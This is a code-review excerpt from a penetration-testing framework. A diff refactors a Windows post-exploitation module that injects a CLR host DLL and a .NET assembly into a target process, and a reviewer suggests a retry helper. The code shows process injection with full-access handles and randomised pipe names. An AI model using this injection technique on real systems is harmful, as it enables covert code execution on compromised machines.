modules/post/windows/manage/execute_dotnet_assembly.rb

```diff
@@ -190,70 +223,117 @@ def inject_hostclr_dll(process)
 
     print_status("Injecting Host into #{process.pid}...")
     exploit_mem, offset = inject_dll_into_process(process, library_path)
+    memory_to_free.append(exploit_mem)
     [exploit_mem, offset]
   end
 
-  def open_process
-    pid = datastore['PID'].to_i
+  def open_process(pid)
+    if (pid == 0) || pid.nil?
+      fail_with(Failure::BadConfig, 'Inject technique selected, but no PID set')
+    end
 
     if pid_exists(pid)
-      print_status("Opening handle to process #{datastore['PID']}...")
-      hprocess = client.sys.process.open(datastore['PID'], PROCESS_ALL_ACCESS)
+      print_status("Opening handle to process #{pid}...")
+      hprocess = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
       print_good('Handle opened')
-      [nil, hprocess]
+      hprocess
     else
-      print_bad('Pid not found')
-      [nil, nil]
+      fail_with(Failure::BadConfig, 'Pid not found')
     end
   end
 
-  def execute_assembly(exe_path)
-    if sysinfo.nil?
-      fail_with(Failure::BadConfig, 'Session invalid')
+  def execute_assembly(exe_path, clr_version)
+    if datastore['TECHNIQUE'] == 'SPAWN_AND_INJECT'
+      self.hprocess = launch_process
+      self.terminate_process = datastore['KILL']
     else
-      print_status("Running module against #{sysinfo['Computer']}")
-    end
-    if datastore['PID'].positive? || datastore['WAIT'].zero? || datastore['PPID'].positive?
-      print_warning('Output unavailable')
-    end
+      if datastore['TECHNIQUE'] == 'INJECT'
+        inject_pid = datastore['PID']
+      elsif datastore['TECHNIQUE'] == 'SELF'
+        inject_pid = client.sys.process.getpid
+      end
 
-    if (datastore['PPID'] != 0) && (datastore['PID'] != 0)
-      print_error('PID and PPID are mutually exclusive')
-      return false
+      self.hprocess = open_process(inject_pid)
     end
 
-    if datastore['PID'] <= 0
-      process, hprocess = launch_process
-    else
-      process, hprocess = open_process
+    arch = session.sys.process.each_process.find { |i| i['pid'] == hprocess.pid } ['arch']
+    if arch != ARCH_X64
+      fail_with(Failure::BadConfig, 'execute_dotnet_assembly currently only supports x64 processes')
     end
+
     exploit_mem, offset = inject_hostclr_dll(hprocess)
 
-    assembly_mem = copy_assembly(exe_path, hprocess)
+    pipe_suffix = Rex::Text.rand_text_alphanumeric(8)
+    pipe_name = "\\\\.\\pipe\\#{pipe_suffix}"
+    appdomain_name = Rex::Text.rand_text_alpha(9)
+    assembly_mem = copy_assembly(pipe_name, appdomain_name, clr_version, exe_path, hprocess)
 
     print_status('Executing...')
-    hprocess.thread.create(exploit_mem + offset, assembly_mem)
+    begin
+      thread = hprocess.thread.create(exploit_mem + offset, assembly_mem)
+      handles_to_close.append(thread)
+
+      pipe = nil
+      10.times do |_i|
```

Comment:
We have a `retry_until_truthy` function that could be helpful here with an exponential backoff.

https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/retry.rb#L8

Reply:
Nice - thanks for the heads up!